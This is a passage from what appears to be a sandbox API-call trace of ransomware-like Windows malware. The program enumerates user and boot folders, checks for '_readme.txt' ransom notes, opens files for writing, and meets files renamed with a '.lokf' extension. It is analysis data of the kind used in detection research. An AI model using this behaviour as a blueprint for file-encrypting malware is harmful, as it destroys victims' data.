ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20ce5210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20ce5210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.643] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.644] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0146.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0146.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.644] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.644] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.644] PathFindFileNameW (pszPath="") returned="" [0146.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20d57630, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20d57630, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.646] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.646] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\") returned="eIv9rDB\\" [0146.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0146.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.647] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.647] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.647] PathFindFileNameW (pszPath="") returned="" [0146.647] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x20defbb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20defbb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.650] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.651] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\") returned="m4--j\\" [0146.654] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0146.654] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.654] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.654] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.654] PathFindFileNameW (pszPath="") returned="" [0146.654] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x20efa550, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20efa550, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.657] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.658] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.658] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\") returned="Pt3T5YLjsfWTS8bTn\\" [0146.658] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0146.658] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.658] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.658] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.658] PathFindFileNameW (pszPath="") returned="" [0146.658] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0x21004ef0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21004ef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.661] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.661] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.661] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\") returned="27nF\\" [0146.661] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0146.662] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.662] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.662] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.662] PathFindFileNameW (pszPath="") returned="" [0146.662] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x210c35d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x210c35d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.664] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.665] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.665] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\") returned="jYsvlZ\\" [0146.665] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0146.665] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.665] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.665] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.665] PathFindFileNameW (pszPath="") returned="" [0146.665] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x2115bb50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2115bb50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.668] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.669] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.669] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.669] PathFindFileNameW (pszPath="") returned="" [0146.669] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.669] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.669] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.669] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.670] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0146.670] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0146.670] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x3220d58 [0146.670] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0146.670] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0146.670] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.672] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0146.672] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0146.672] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0146.672] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.672] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.672] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.672] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.672] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.672] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.672] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.672] PathFindFileNameW (pszPath="") returned="" [0146.672] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.672] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.673] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.673] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.673] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.673] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.673] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.673] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.673] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.673] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.673] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.673] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.673] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.673] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.673] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0146.673] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.673] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.673] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 1 [0146.674] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.674] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.674] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1fd20050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1fd20050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.674] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.674] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1fd20050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1fd20050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.674] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0146.674] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.674] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0146.674] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.674] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0146.674] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.674] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0146.674] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.674] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.674] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1.lokf", cAlternateFileName="BCDLOG~1.LOK")) returned 1 [0146.674] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.675] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1.lokf") returned=".lokf" [0146.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.675] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2.lokf", cAlternateFileName="BCDLOG~2.LOK")) returned 1 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.675] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2.lokf") returned=".lokf" [0146.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.675] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x1fcf9ef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1014e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT.lokf", cAlternateFileName="BOOTST~1.LOK")) returned 1 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6b98 [0146.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.675] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT.lokf") returned=".lokf" [0146.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6b98 | out: hHeap=0x6e0000) returned 1 [0146.675] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x3240c80 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d70 [0146.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.675] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x38) returned 0x3220d98 [0146.675] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d48 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d70 | out: hHeap=0x6e0000) returned 1 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c80 | out: hHeap=0x6e0000) returned 1 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.676] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x54) returned 0x3216cb0 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d70 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d20 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d48 | out: hHeap=0x6e0000) returned 1 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c80 | out: hHeap=0x6e0000) returned 1 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3220d98 | out: hHeap=0x6e0000) returned 1 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.676] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x70) returned 0x31f3c98 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d48 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cf8 [0146.676] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d70 | out: hHeap=0x6e0000) returned 